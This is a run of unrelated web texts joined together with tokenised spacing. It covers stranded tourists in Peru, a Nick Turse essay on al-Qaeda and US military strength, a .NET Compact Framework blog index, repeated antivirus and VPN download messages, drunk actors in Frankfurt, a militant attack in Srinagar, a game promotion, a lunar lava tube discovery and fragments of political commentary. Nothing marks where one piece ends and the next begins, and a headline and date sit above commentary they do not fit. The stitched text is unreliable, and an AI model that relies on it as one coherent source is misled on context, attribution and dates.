A West Australian tourist trapped in Peru says her group has been abandoned by their tour guide as stocks of fresh food and water in town dwindle .
An estimated 2,000 tourists were trapped when mudslides blocked roads and rail lines to the tourist town of Aguas Calientes , which is close to the famous Inca ruins of Machu Picchu .
Victoria MacMillan , 23 , was trekking with three friends when the landslides swept away roads and train lines , trapping them in the town .
She says communication is difficult as their Spanish translator and tour guide left the group yesterday and escaped through the mountains .
" Most of them have taken off , either yesterday or this morning , " she said .
" They just do n't want to stay here any longer and because they know the mountains , they 've gone off and we do n't know where they are . "
She also says the mood is deteriorating as stocks of fresh food and water dwindle .
She says fresh food is scarce and bottled water is getting increasingly expensive .
She estimates they have supplies for several more days before the situation becomes dire .
" It was okay for the first couple of days but now , things are getting really tense , " she said .
" There are rumours that it might take us seven days to get out of here and we 're just worried that with no money and food running out , that things are going to get really tense and we 're going to end up in the square , fighting over a packet of rice with people . "
Ms MacMillan says the paths leading out of the town have been cordoned off as authorities try to prevent tourists attempting to travel through the mountains without guides .
' No contact '
A Canberra man whose son is trapped by the Peruvian mudslides says the Australian consulate in Lima is proving difficult to contact .
Habibur Rahmun says his 25 - year - old son is stranded at a train station at Aguas Calientes .
He says both he and his son have tried to contact the consulate only to be met with a a recorded message .
Mr Rahmun says he has not heard from his son for four days .
" They said that there is no contact , they cannot contact anyone from the Australian consulate office , or that they do n't know exactly what is going on , " he said .
He says American officials have sent helicopters to evacuate their citizens and he has called on Australia to do the same .
With roads and train lines closed due to flooding , the painstaking evacuation effort is being carried out by helicopters .
Rescuers are reportedly prioritising those over 60 years old and women with children .
The Department of Foreign Affairs and Trade has yet to determine the number of stranded Australian citizens but it is believed to be as high as 200 .
With rains expected to continue through the weekend , the rescue effort is likely to proceed slowly .
In his book on World War II in the Pacific , War Without Mercy , John Dower tells an extraordinary tale about the changing American image of the Japanese fighting man .
In the period before the surprise attack on Pearl Harbor , it was well accepted in military and political circles that the Japanese were inferior fighters on the land , in the air , and at sea — " little men , " in the phrase of the moment .
It was a commonplace of " expert " opinion , for instance , that the Japanese had supposedly congenital nearsightedness and certain inner-ear defects , while lacking individualism , making it hard to show initiative .
In battle , the result was poor pilots in Japanese - made ( and so inferior ) planes , who could not fly effectively at night or launch successful attacks .
In the wake of their precision assault on Pearl Harbor , their wiping out of U.S. air power in the Philippines in the first moments of the war , and a sweeping set of other victories , the Japanese suddenly went from " little men " to supermen in the American imagination ( without ever passing through a human phase ) .
They became " invincible " — natural - born jungle - and night - fighters , as well as " utterly ruthless , utterly cruel , and utterly blind to any of the values which make up our civilization . "
Sound familiar ?
It should .
Following September 11 , 2001 , news headlines screamed " A NEW DAY OF INFAMY , " and the attacks were instantly labeled " the Pearl Harbor of the twenty - first century . "
Soon enough , al - Qaeda , like the Japanese in 1941 , went from a distant threat — the Bush administration , on coming into office , paid next to no attention to al - Qaeda ’s possible plans — to a team of arch - villains with little short of superpowers .
After all , they had already destroyed some of the mightiest buildings on the planet , were known to be on the verge of seizing weapons of mass destruction , and , if nothing was done , might soon enough turn the Muslim world into their " caliphate . "
Al - Qaeda was suddenly an organization against which you would n’t launch anything less than the full strength of the armed forces of the world ’s " sole superpower . "
To a surprising extent , they are still dealt with this way .
You can feel it , for instance , in the recent 24/7 panic over the thoroughly inept underwear bomber and the sudden threat of a few hundred self - proclaimed al - Qaeda members in Yemen .
You can feel it in the ramping up of the Af - Pak War .
You can hear it in the " debate " over moving al - Qaeda detainees from Guantánamo to U.S. maximum security prisons .
The way some politicians talk , you might think those detainees were all Lex Luthors and Magnetos , super - villains incapable of being held by any prison , just like the almost magically impossible - to - find Osama bin Laden and Ayman al - Zawahiri in the wild borderlands of Afghanistan and Pakistan .
Because most Americans have never dealt with or thought of al - Qaeda as a group made up of actual human beings or accepted that , for every televisually striking success , they have an operation ( or several ) that go bust , the U.S. ca n’t begin to imagine what it ’s actually up against .
The current president , like the last one , claims that we are " at war . "
If so , it ’s a war of one , since al - Qaeda and the U.S. military are essentially not in the same war - fighting universe , which helps explain why repeatedly knocking off significant portions of al - Qaeda ’s leadership ( even if never finding bin Laden and Zawahiri ) does n’t seem to end the threat .
But let ’s stop here and try , for a moment , to imagine these two enemies side by side in the same universe of war .
What , in that case , would the line - up of forces look like ?
Assessing al - Qaeda ’s " Troops "
According to U.S. intelligence estimates , there are currently about 100 al - Qaeda fighters in Afghanistan , as well as " several hundred " in Pakistan and , so the latest reports tell us , a similar number in Yemen .
Members of al - Qaeda in the Islamic Maghreb ( Algeria , Mali , and Mauritania ) and those based in Somalia undoubtedly fall into the same category at several hundred each .
According to authorities from the Iraq Study Group to the U.S. State Department , even at the height of the insurgency and civil war in Iraq , al - Qaeda in Mesopotamia never had more than 1,300 - 4,000 active fighters .
Today , it is believed to consist only of " small , roving cells . "
Combined , these groups — think of them as al - Qaeda ’s shock troops — add up to perhaps 2,100 fighters , about one - fifth the number of U.S. troops now based in Italy .
As the 9/11 attacks , the intelligence on Iraqi weapons of mass destruction , and the failure to disrupt the underwear - bomber ’s plot indicate , U.S. intelligence has long been flying blind , but even if al - Qaeda turned out to have sleeper cells with 300 additional committed members in every nation on Earth , its clandestine operatives would only moderately exceed the number of U.S. forces now based in Germany .
Al - Qaeda does , of course , have some " training camps " in the backlands of countries like Yemen , and it has civilian supporters , financiers , and other scattered allies .
Over the years , and sometimes with good reason , Washington has lumped Taliban fighters in Afghanistan and Pakistan with al - Qaeda and counted various militant groups , including Somalia ’s al - Shabab Islamic rebels , as al - Qaeda affiliates .
Add such fighters in and you would swell these numbers by many thousands .
Additionally , al - Qaeda has an arsenal of weaponry .
Members have access to rocket - propelled grenades , small arms of various sorts , the materials for making deadly roadside bombs , car bombs , and of course underwear bombs .
Assessing America ’s Troops
U.S. efforts to crush al - Qaeda have certainly not failed for lack of resources .
The U.S. military has spent about one trillion dollars on its post - 9/11 wars so far .
It has an Army , a Navy , an Air Force , and a Marine Corps which , like the Navy , has its very own air force .
It possesses trillions of dollars in weapons , materiel , and other assets .
It can mobilize spy satellites , advanced fighter planes and bombers , high - tech drones and helicopters , fleets of trucks , tanks , and other armored vehicles .
It has advanced missiles and smart bombs , aircraft carriers , nuclear submarines , and state - of - the - art ships in all shapes and sizes .
It also has incredibly well - trained special operations forces — almost 56,000 elite troops , including Army Rangers and Special Forces , Navy SEALs and Special Boat Teams , Air Force Special Tactics Teams , and Marine Corps Special Operations Battalions , armed with incredibly advanced weaponry .
It has military academies that churn out highly - educated officers and specialized training camps , schools , and universities .
It has more than half - a- million buildings and structures on more than 800 bases sitting on millions of acres of prime real estate scattered around the world , including in or near lands where various branches of al - Qaeda operate .
In addition , the U.S. military has manpower — lots of it .
All told , the United States has approximately 1.4 million active duty men and women under arms and another 1.3 million reserve personnel .
It employs more than 700,000 civilians in support roles — from stocking shelves and serving food at stateside bases to assisting in intelligence analysis in war zones — and utilizes untold tens of thousands of private security hired - guns and various other kinds of private contractors all around the globe .
These numbers would be further swelled by intelligence agents who aid military efforts , including 100,000 members of the civilian intelligence community .
And then there are the allies the U.S. can draw on ranging , in Afghanistan alone , from the Afghan army and police to tens of thousands of NATO and other foreign allied troops from more than 40 countries .
Comparing the Sides : The Mark of the Beast or the Mark of Futility ?
Even excluding from the U.S. side of the equation all those U.S. reserves , Defense Department civilians , intelligence operatives and analysts , private contractors and allies of various sorts , if you compare the two enemies in the current " war , " you still end up with either the Mark of the Beast or a marker for futility .
The active duty U.S. military alone enjoys a 666:1 advantage over the estimated number of al - Qaeda fighters in Afghanistan , Pakistan , Yemen , Iraq , Algeria , Mauritania , Mali , and Somalia .
Adding in the reserves , the ratio jumps to an embarrassingly - high 1,286:1 .
Even if you were to factor in those hordes of nonexistent al - Qaeda sleeper agents , 300 each for 195 countries from Australia to Vatican City , the U.S. military would still enjoy a 23:1 advantage ( or 45: 1 if you included the reserves , now regularly sent into war zones on multiple tours of duty ) .
In sum , after the better part of a decade of conflict , the United States has spent trillions of taxpayer dollars on bullets and bombs , soldiers and drones .
It has waged wars in Iraq and Afghanistan that have yet to end , launched strikes in Pakistan , Yemen , and Somalia , dispatched Special Ops troops to those nations and others , like the Philippines , and built or expanded hundreds of new bases all over the world .
Yet Osama bin Laden remains at large and al - Qaeda continues to target and kill Americans .
Open -Source al - Qaeda
Founded in 1988 , bin Laden ’s al - Qaeda formally issued a " declaration of war " on the United States in 1996 , primarily over the U.S. military presence in the Middle East .
While Washington has been hunting bin Laden and al - Qaeda since the mid-1990s , a post - 9/11 Congressional resolution authorized the president to use force against that group and the Taliban .
Ever since , the Pentagon has been waging one of the most ineffective campaigns of modern times in an effort to destroy it .
During these years , President George W. Bush declared himself a " war president " heading a country " at war " and living in " wartime . "
In a milder way , President Obama has repeatedly declared the U.S. to be " at war " and , as in his surge speech at West Point in December , has identified the main enemy in that war as al - Qaeda .
In the process , the U.S. military has unleashed tremendous destructive power on parts of Afghanistan , Pakistan , Iraq , Yemen , and Somalia causing the deaths of al - Qaeda fighters , non-Qaeda militants , and innocent civilians .
Thousands of its own troops have died and tens of thousands have been wounded in the process , not to mention the losses to allied forces .
In these years , new al - Qaeda " affiliates " like al - Qaeda in Iraq / Mesopotamia have nonetheless sprung to life regularly and , as in Yemen , have even been officially crushed , only to be reborn .
These groups have often made up their own " al - Qaeda " membership requirements , and focused on their own chosen targets .
Meanwhile , al - Qaeda wannabes and look - alikes have proliferated and the organization ( or those sympathetic to it or praising it ) has reportedly spurred further attacks in the U.S. and encouraged men from New York to California , Nigeria to Jordan , to join the movement , and then work , fight , kill , and die for it , sometimes in attacks on Americans .
Al - Qaeda has no tanks , Humvees , nuclear submarines , or aircraft carriers , no fleets of attack helicopters or fighter jets .
Al - Qaeda has never launched a spy satellite and is n’t developing advanced drone technology ( although it may be hacking into U.S. video feeds ) .
Al - Qaeda specializes in low - budget operations ranging from the incredibly deadly to the incredibly ineffectual — from murderous car bombs and airplanes - used - as - missiles to faulty shoe - and underwear - explosives .
Of course , comparisons of the strengths of the U.S. military and al - Qaeda " at war " would be absurd , if it were n’t for the fact that the United States actually went to war against such a group .
It was a decision about as effective as firing a machine gun at a swarm of gnats .
Some may die , but the process is visibly self - defeating .
In the present War on Terror , called by whatever name ( or , as at present , by no name at all ) , the two " sides " might as well be in different worlds .
After all , al - Qaeda today is n’t even an organization in the normal sense of the term , no less a fighting bureaucracy .
It is a loose collection of ideas and a looser collection of individuals waging open - source warfare .
You do n’t sign up for al - Qaeda the way you would for the U.S. Army .
If you and two friends are sitting around a table in some country and you ’re angry , alienated , and dissatisfied with the state of the world , you can simply claim to adhere to the basic ideas of Osama bin Laden and declare yourself al - Qaeda in [ fill in the blank ] .
Who then gets into your organization and how you link up , if at all , with other " al - Qaedas " is up to you .
That ’s why groups like al - Qaeda in Mesopotamia are always referred to in the press as " homegrown . "
What you have , then , in this post - War - on - Terror war is a massive global military force aided and abetted by allied troops , " native " forces , and all sorts of corporate contractors facing off against something fluid and " homegrown , " fierce but strangely undefined , constantly morphing and shape - shifting .
Every one of its " members " could be destroyed without the " enemy " being destroyed , because the enemy is a set of ideas , however extreme or strange to most Americans .
The Pentagon , with its giant bureaucracy and its miles of offices and corridors , is the headquarters of the U.S. war effort , but there is no central al - Qaeda headquarters , not in Afghanistan or Pakistan — not anywhere .
There is probably no longer even an " al - Qaeda central . "
Osama bin Laden has vanished or , for all we know , may be dead .
Think of it , at best , as an open - source organization that is remarkably capable of replicating by a process of self - franchising .
Is n’t it time , then , to stop imagining al - Qaeda as a complex organization of terrorist supermen capable of committing super - deeds , or as an organization that bears any resemblance to a traditional enemy military force ?
With al - Qaeda , the path of war has undoubtedly been the road to perdition — as we should have discovered by now , more than one trillion dollars later .
When this " war " began , George W. Bush and his followers , like Osama bin Laden and his followers , were eager to proclaim future " victory " and to say with bravado to the other side : " Bring ‘ em on ! "
The word " victory " has long since fled Washington ’s lips , along with boasts that the U.S. is a new Rome .
So far , no matter how many of its operatives may be dead , " victory " remains on the lips of those calling themselves al - Qaeda - in - anywhere .
After all , they did get Washington to " bring ‘ em on " and the results have been disastrous and draining for the United States .
The U.S. military has killed many al - Qaeda operatives , but it cannot annihilate its appeal by " surging " in Afghanistan and making war , with all the civilian destruction involved , in Muslim lands .
It ’s time to put al - Qaeda back in perspective — a human perspective , which would include its stunning successes , its dismal failures , and its monumental goof - ups , as well as its unrealizable dreams .
( No , Virginia , there will never be an al - Qaeda caliphate in or across the Greater Middle East . )
The fact is : al - Qaeda is not an apocalyptic threat .
Its partisans can cause damage , but only Americans can bring down this country .
Nick Turse is the associate editor of TomDispatch.com and the winner of a 2009 Ridenhour Prize for Reportorial Distinction as well as a James Aronson Award for Social Justice Journalism .
His work has appeared in the Los Angeles Times , the Nation , In These Times , and regularly at TomDispatch .
Turse is currently a fellow at New York University ’s Center for the United States and the Cold War .
He is the author of The Complex : How the Military Invades Our Everyday Lives ( Metropolitan Books ) .
His website is NickTurse.com .
Copyright 2010 Nick Turse and Tom Engelhardt
. NET Compact Framework Team
2/7/2020
7 minutes to read
In this article
Check out some of the known issues in MIX drop posted here .
Author : mahathi Date : 03/24/2010
Check out the blog posts by Yash here , on transparency in CF .
Author : mahathi Date : 03/21/2010
Here are a bunch of early links to get you folks started : - Where can I find bits to play around ...
Author : mahathi Date : 03/15/2010
Today at MIX we announce the application development platform for Windows Phone 7 series , a ...
Author : mahathi Date : 03/15/2010
Check out Manish ’s blog on NetcfSvcUtil.exe crashing on some operating systems and the uploaded fix ...
Author : mahathi Date : 08/10/2009
Check out the Back to basics GC series published a while ago by Abhinaba !!
Author : mahathi Date : 07/10/2009
Check out Mahathi ’s blog about a WCF for mobile whitepaper published recently by one of the MVPs .
Author : mahathi Date : 07/08/2009
Manish has posted regarding a hotfix for the HTTPS related issue discussed in a previous post .
The ...
Author : mahathi Date : 07/02/2009
We would like to revive the NETCF team blog and post here instead of the mobile developer blog as we ...
Author : mahathi Date : 07/01/2009
Check out Manish ’s blog regarding this .
Author : mahathi Date : 06/22/2009
We , the NetCF team , have decided to combine our blog with the other teams doing mobile development ...
Author : MSDN Archive Date : 05/08/2008
The Power Toys for .NET Compact Framework 3.5 have just gone live at ...
Author : Garry Trinder Date : 12/13/2007
On his blog , Andrew discusses an HTTPS bug in NetCF that causes NetCF to throw a WebException when ...
Author : Andrew L Arnott Date : 11/21/2007
Over the past couple of months , I have been serializing my experiences in writing the Lunch Launcher ...
Author : MSDN Archive Date : 11/12/2007
Hey everyone , I 've posted a quick overview of how to use the .
NETCF Remote Logging tool to help ...
Author : Garry Trinder Date : 11/01/2007
I 've updated the .NET Compact Framework catalog with the some new applications and libraries , and ...
Author : MSDN Archive Date : 09/25/2007
The Power Toys for .
NET Compact Framework 3.5 CTP ( September 2007 ) has just been released as an MSDN ...
Author : MSDN Archive Date : 09/12/2007
Andrew Arnott discusses which versions of the .NET Compact Framework can be side - by - side installed , ...
Author : Andrew L Arnott Date : 09/07/2007
Andrew Arnott details the features of WCF that are and are not supported by NetCF on his blog .
Author : Andrew L Arnott Date : 09/07/2007
On his blog , Andrew Arnott discusses how to avoid depending on the internal details of NetCF ( or the ...
Author : MSDN Archive Date : 07/02/2007
Microsoft .NET
Compact Framework version 2.0 SP2 release is completed and is in the process of being ...
Author : MSDN Archive Date : 03/13/2007
During our test pass against v2 sp2 , we tested backwards compatibility with previous releases by ...
Author : MSDN Archive Date : 03/09/2007
Here 's the scenario :
You are writing an NetCF app and trying to call a web service from that app ....
Author : MSDN Archive Date : 02/01/2007
I 've posted an updated .NET Compact Framework catalog to the internet .
The catalog has outgrown the ...
Author : MSDN Archive Date : 01/30/2007
The .NET Compact Framework team has spent the last year planning and developing the next version of ...
Author : MSDN Archive Date : 01/28/2007
... continuation of Part 1 , it can be found here Memory and Garbage Collection One common concern for ...
Author : MSDN Archive Date : 12/22/2006
Introduction Now that XNA Game Studio Express 1.0 is out , it ’s time to start writing managed code ...
Author : MSDN Archive Date : 12/22/2006
The .NET Compact Framework has had several loggers ( error , interop , loader , and networking ) in ...
Author : MSDN Archive Date : 12/18/2006
There are times that you may wish to serialize one or more fields as attributes on the object 's node ...
Author : MSDN Archive Date : 10/05/2006
Dan Elliott recently posted about the IL OpCodes supported by the .NET Compact Framework .
This got ...
Author : MSDN Archive Date : 10/05/2006
The instruction set for a CLI compliant execution engine is described by ECMA 's CLI Partition III ...
Author : MSDN Archive Date : 10/05/2006
I was talking with Mark Prentice today and we were looking at filtering a TextBox control so that it ...
Author : MSDN Archive Date : 10/05/2006
When debugging using command line tools , one of the most challenging tasks is getting the fully ...
Author : MSDN Archive Date : 10/05/2006
One of the comments I 've heard frequently since I began working on the CF GUI base class libraries ...
Author : MSDN Archive Date : 10/05/2006
Pocket PC 's have touch screens .
Smartphones do n't .
While it is straightforward to determine which of ...
Author : MSDN Archive Date : 10/02/2006
While both Smartphones and Pocket PCs are based on Windows Mobile , there are some very important ...
Author : MSDN Archive Date : 09/22/2006
When you develop your Windows CE or Windows Mobile application in .NET Compact Framework , you ...
Author : MSDN Archive Date : 09/15/2006
Diagnostic , performance and debugging tools are very cool .
The more tools available , the easier it ...
Author : MSDN Archive Date : 08/31/2006
Being able to attach to a running process is a very powerful debugger feature .
It is especially ...
Author : MSDN Archive Date : 08/25/2006
“ Do bitmaps leak memory ? ”
No , but without careful coding it could appear that they do .
Read more ...
Author : MSDN Archive Date : 08/23/2006
With the addition of support for headless devices , it became apparent that we needed a means for ...
Author : MSDN Archive Date : 08/23/2006
In the previous parts of this series , I talked about getting started with MDbg and using the Device ...
Author : MSDN Archive Date : 08/23/2006
. NET Compact Framework v2.0 SP1 includes support for Windows CE 4.2 based devices .
To date , Visual ...
Author : MSDN Archive Date : 08/23/2006
By default , the Device Emulator uses DMA as it's transport for device to desktop communications .
The ...
Author : MSDN Archive Date : 08/23/2006
With the release , last year , of version 2 of the .NET Framework SDK , a new command line debugger ...
Author : MSDN Archive Date : 08/23/2006
To make it easier to find the great information that the .NET Compact Framework team is publishing ...
Author : MSDN Archive Date : 08/23/2006
Developers who wish to update the build of .
NET Compact Framework v2 to SP1 with extended Visual ...
Author : MSDN Archive Date : 08/04/2006
52 applications were tested for v2 SP1 , 9 of them were built with v2 .
We do n't expect to see many ...
Author : MSDN Archive Date : 07/11/2006
Here 's an updated list of applications for Pocket PC and Smartphones and libraries built for the ...
Author : MSDN Archive Date : 07/11/2006
Microsoft .NET
Compact Framework version 2.0 SP1 release has been completed and is in the process of ...
Author : MSDN Archive Date : 06/21/2006
Next >
Hold on .
Are you sure ?
This antivirus file is for PC and wo n't work on your Mac .
This antivirus file is for PC and wo n't work on your Android .
This antivirus file is for PC and wo n't work on your iOS .
This antivirus file is for Mac and wo n't work on your PC .
This antivirus file is for Mac and wo n't work on your Android .
This antivirus file is for Mac and wo n't work on your iOS .
This antivirus file is for Android and wo n't work on your PC .
This antivirus file is for Android and wo n't work on your Mac .
This antivirus file is for Android and wo n't work on your iOS .
This antivirus file is for iOS and wo n't work on your PC .
This antivirus file is for iOS and wo n't work on your Mac .
This antivirus file is for iOS and wo n't work on your Android .
This antivirus file is for PC and wo n’t work on your machine .
This antivirus file is for Mac and wo n’t work on your machine .
This antivirus file is for Android and wo n’t work on your machine .
This antivirus file is for iOS and wo n’t work on your machine .
This file is for PC and wo n't work on your Mac .
This file is for PC and wo n't work on your Android .
This file is for PC and wo n't work on your iOS .
This file is for Mac and wo n't work on your PC .
This file is for Mac and wo n't work on your Android .
This file is for Mac and wo n't work on your iOS .
This file is for Android and wo n't work on your PC .
This file is for Android and wo n't work on your Mac .
This file is for Android and wo n't work on your iOS .
This file is for iOS and wo n't work on your PC .
This file is for iOS and wo n't work on your Mac .
This file is for iOS and wo n't work on your Android .
This antivirus file is for PC and wo n’t work on your machine .
This antivirus file is for Mac and wo n’t work on your machine .
This antivirus file is for Android and wo n’t work on your machine .
This antivirus file is for iOS and wo n’t work on your machine .
This VPN file is for PC and wo n't work on your Mac .
This VPN file is for PC and wo n't work on your Android .
This VPN file is for PC and wo n't work on your iOS .
This VPN file is for Mac and wo n't work on your PC .
This VPN file is for Mac and wo n't work on your Android .
This VPN file is for Mac and wo n't work on your iOS .
This VPN file is for Android and wo n't work on your PC .
This VPN file is for Android and wo n't work on your Mac .
This VPN file is for Android and wo n't work on your iOS .
This VPN file is for iOS and wo n't work on your PC .
This VPN file is for iOS and wo n't work on your Mac .
This VPN file is for iOS and wo n't work on your Android .
This antivirus file is for PC and wo n’t work on your machine .
This antivirus file is for Mac and wo n’t work on your machine .
This antivirus file is for Android and wo n’t work on your machine .
This antivirus file is for iOS and wo n’t work on your machine .
Actors are often warned never to work with children or animals .
To that list , 80 proof Russian vodka should now be added .
A performance at Frankfurt 's prestigious Schauspielhaus theatre ended in chaos after four of Germany 's top actors decided " as an experiment " to substitute vodka for water during a performance of a play described in the programme notes as a " crazy depiction of one of the most famous alcoholic benders in world literature " .
Moscow
To the End of the Line , a 1970 novel by the late Russian author Venedikt Erofeev , is a satirical account of a cable fitter sacked after checking the amount of alcohol fellow workers consume .
The action takes place in Soviet times as the worker takes a train across Russia to reach his lover in a remote village .
In their stage adaptation of the story , the actors , Torben Kessler , Michael Abendroth , Marc Oliver Schulze and Oliver Kraushaar , decided the best way to embody their characters – the worker and his fellow passengers who spend the journey binge - drinking and never arrive at their destination – was to hit the bottle .
Initially the audience was amused .
But then alarm grew as they started falling off chairs and tables and inviting theatregoers to take swigs out of their bottles .
" At first it was quite impressive , they seemed to be giving a good impersonation of tipsiness , " one audience member told a German newspaper .
" Then they started leaping around shouting ' Na zdorovje ' ( cheers in Russian ) ... and then they handed round the drink . "
One of the actors could no longer stand up ; another , literally , slipped up on his script .
" People started clapping , thinking it belonged to the performance , " the theatregoer said .
When one of the actors fell off the stage on his chair and his co-actor fell from a table , the backstage crew intervened and called an ambulance .
The uproar continued in the ambulance where Schulze , 36 , allegedly became violent , forcing the medics to call for police backup .
Schulze later had his stomach pumped at Frankfurt 's university clinic .
Called to account for the behaviour of his actors , director Oliver Reese said : " It was seen as a bit of an experiment , sort of along the lines of ' let 's perform this wonderful text and have a bit of a drink at the same time ' and it went a bit awry .
" One of the actors in particular clearly drank too much vodka , on an empty stomach .
That in combination with the adrenalin an actor already feels when he's on stage caused him to go off the rails .
His self - control failed him . "
Reese summoned the actors for a dressing down after the performance .
" I told them I did n't want to see anything like that ever again .
It was kindergarten behaviour . "
The actors had recovered well , he said .
• This article was amended on 29 January 2010 .
Due to an editing error , the original referred to " 80 % proof " vodka .
The original also transliterated a Russian phrase for cheers / good health as nastrovia .
This has been corrected .
SRINAGAR : A policeman was on Wednesday killed and three civilians were injured as terrorists struck in the heart of Srinagar , entering a hotel lobbing grenades .
( Watch Video )
Jamiat - ul - Mujahideen , one of the rebel groups active in the area claimed responsibility for the attack by faxing a statement to the local offices of a news agency .
`` The attack is in response to India 's propaganda that the armed struggle has weakened in Kashmir , '' the statement said .
As it grew dark , the security forces put up floodlights around the Punjab Hotel building where the militants are holed up .
The area has been marked off with concertina wires to ensure the guerrillas do not escape under the cover of darkness .
" We are cautious that no collateral damage takes place , " a police officer said .
Police were not sure of any civilian trapped in the hotel building which hindered the prospect of launching the final assault .
The militants were using the building as a fortified bunker and firing intermittently at the surrounding security forces .
" The hotel building will have to be stormed by commandoes if the militants refuse to surrender , " said a paramilitary officer .
The dead policeman , identified as Mohammed Yusuf who was posted as driver of the Station House Officer of Maisuma Police station , was killed during the attack , official sources said .
Seven persons , including a woman , have been admitted to the SHMS hospital here .
" We have received seven persons with bullet and splinter injuries so far .
The condition of one of them is critical and he is presently undergoing operation , " Chief Medical Officer of the hospital Mushtaq Ahmad said .
While four of them were hit by bullets , the rest had splinter injuries , hospital sources said and identified three as Rouf Ahmad , a cameraman , Zahdish of Srinagar and Mohammad Akbar Lone of Tangmarg .
The injured civilians included a cameraman from a television news channel , said Sajad Ahmed , a police officer .
So far over 100 civilians trapped inside shops and other buildings have been evacuated from Court road , Pladium chowk , Koker Bazar and adjoining areas to safer places , a police officer said .
The terrorists , believed to be " fidayeen " ( suicide squad ) , initially lobbed grenades on a CRPF picket at Pladium Chowk and followed it by indiscriminate firing around 2.15 pm .
The CRPF and police personnel deployed in the area retaliated and the militants , whose number could not be ascertained immediately , reportedly took shelter inside a hotel .
They opened fire and lobbed grenades on the security forces .
The whole area was immediately cordoned off to neutralize the militants , a police officer said .
The entire area wore a deserted look with reinforcements rushing to the scene to tackle the situation arising out of the attack in the valley in more than two years .
The last suicide attack was carried out in Dal Lake area of Srinagar in October 2007 in which two terrorists were killed and three securitymen injured .
Today 's attack came a day after the National Conference - led coalition government completed its first year in office and listed in its achievements , improved security situation .
Ir/rational Redux - with all new visuals and sound - is now live over at Newgrounds !
" I think , therefore I am . "
" As certainties go , knowing that you ’re some kind of thinking thing … some kind of living , thinking thing … is n’t exactly helpful .
Knowing it ’s bloody dark does n’t get you much further . "
ir / rational is the dark philosophical tale of one man 's struggle to come to terms with his powers of deduction .
It 's also a short , text - based logic puzzle .
It 's probably some other things as well .
Regardless , ir / rational is written , designed and developed by Tom Jubert ( Penumbra 's Narrative Designer ) , with music by award - winning Penumbra composer , Mikko Tarmia .
Play ir /rational Redux
But you should .
Also : it ’s well - written , funny ...
You 'll like it .
- Alec Meer , Rock , Paper , Shotgun
If you enjoy ir / rational , why not check out my blog - " Plot is Gameplay 's Bitch "
Argue the toss in a twisted tale of logic ...
* Unique , language - based argument system : formulate logical proofs to progress through the game
* Dark philosophical comedy written by Tom Jubert , award - nominated writer of the critically acclaimed Penumbra series
* 10 screens and roughly half an hour of intelligent , challenging and inventive gameplay
* Musical score by award - winning composer Mikko Tarmia
Player Feedback
" Just wanted to drop you a line and say how much I loved ir / rational .
The amount of atmosphere is amazing . "
- James Stark , Personal Effects
" I really enjoyed playing a game with such a consistent logical flow and I hope to see more of it . "
- Michael Lindner , Donator & DLC Purchaser
" Nifty idea , great implementation .
Makes me wish there were more games like this ... " - F687/s , TIGSource Forums
" Unusual , original and also satisfying . "
- MisterX , TIGSource Forums
" I grew to really love it .
I was actually really sad when it ended and there was n't more . "
- Radica1 Faith , TIGSource Forums
" I felt connected to the protagonist , and the mystery maintained throughout the game managed to keep me interested till the end .
Even then , I was left thinking about the story further . "
- Matt Chandler , Game Tester
" I have n't played anything like it before .
I loved the style of writing . "
- Freddy PM , Game Tester
" The writing was unique and humorous till the end . " - Lee Wolfgang , Game Tester
... and some criticism , just to keep things balanced ...
" It can occasionally just fuck your mind up . " - Lee Wolfgang , Game Tester
To see your words here , email your feedback , good or bad - but ideally grammatically correct ( ish ) - to irrational@tomjubert.com
Download ir/rational 2008 ( 7.23MB )
( CNN ) -- Building a home near a moon crater or a lunar sea may sound nice , but moon colonists might have a much better chance of survival if they just lived in a hole .
That 's the message sent by an international team of scientists who say they 've discovered a protected lunar " lava tube " -- a deep , giant hole -- that might be well suited for a moon colony or a lunar base .
The vertical hole , in the volcanic Marius Hills region on the moon 's near side , is 213 feet wide and is estimated to be more than 260 feet deep , according to findings published in Geophysical Research Letters , a journal of the American Geophysical Union .
More important , the scientists say , the hole is protected from the moon 's harsh temperatures and meteorite strikes by a thin sheet of lava .
That makes the tube a good candidate for further exploration or possible inhabitation , the article says .
" Lunar lava tubes are a potentially important location for a future lunar base , whether for local exploration and development , or as an outpost to serve exploration beyond the Moon , " writes the team , led by Junichi Haruyama , a senior researcher with the Japanese space agency JAXA .
" Any intact lava tube could serve as a shelter from the severe environment of the lunar surface , with its meteorite impacts , high - energy UV radiation and energetic particles , and extreme diurnal temperature variations . "
Lava tubes have previously been discovered on the moon , but the scientists say the new hole is notable because of its lava shield and because it does not appear to be prone to collapse .
Lave tubes exist on Earth and also have been found on Mars .
The cylinder - shaped caverns can be carved out by lava flows , volcanic eruptions , seismic activity or ground collapse resulting from meteoroid strikes .
The scientists used high - resolution images from a Japanese moon orbiter called SELENE to discover this lunar lava tube .
The findings were published November 12 , but they grabbed the attention of the public this week .
NASA is reportedly working on plans to return to the moon by 2020 and to set up a temporary lunar colony by 2025 as part of the Constellation Program .
Funding for the program , however , remains somewhat in question .
The American space agency could not be reached for comment .
JPFO
January 19 , 2010
No Guns for Negroes exposes the racist history behind American gun control laws .
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
LOL GOD
Featured 07/26/2009
I want some of what they 're smoking .
I was recently informed by an insider about how Mark Halperin and John Heilemann had a fantastic scoop in their upcoming election book about how Palin repeatedly could n't get Joe Biden 's name right in prepping for her high - wire debate performance .
Mike Allen leads with the scoop today .
But it is n't a scoop .
Palin , with characteristic canniness , got in her own version of this story first .
If Schmidt really wants to tell his side of this story , he needs to get real .
But to get real , of course , he has to confess that he was guilty of near - criminal professional negligence in selecting Palin without knowing anything about her .
And so Palin gets to tell her lies and spin with impunity .
Because the GOP establishment is both so cynical and condescending to Palin 's base ( she was absolutely right to smell elitist contempt in the mindset of McCain ) , they will never take the Palinites head on .
And because the professionals are busted , Palin gets to define the party and perhaps divide it more profoundly .
The ridden tiger keeps burning brighter .
In many ways , these are perilous populist times for the Democrats .
But when you see Palin stiffing CPAC , embracing the fringe Birther WND right , and when you see Rubio and Brown embrace torture , and when you witness the increasing clout of fundamentalism , and the extremity of the anti-government rhetoric ... you wonder if McCain 's massive blunder did not just destroy what hope he had in 2008 , but was actually a slow - fuse detonator of the entire Republican coalition .
What a loser McCain is .
His soul has been sold so many times now it 's a wonder it 's not on eBay .
And yet he is so useless as a politician , so incapable of winning any national election , and so desperate to do so , he may also have destroyed his career and party in the process .
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
Helping you to attract your wife , beat affairs , breakthrough relationship blockages and get you laid like tile .
I 've helped hundreds of 1:1 coaching clients , and thousands more through my books , blog and the Married Guy 's to Wife video series .
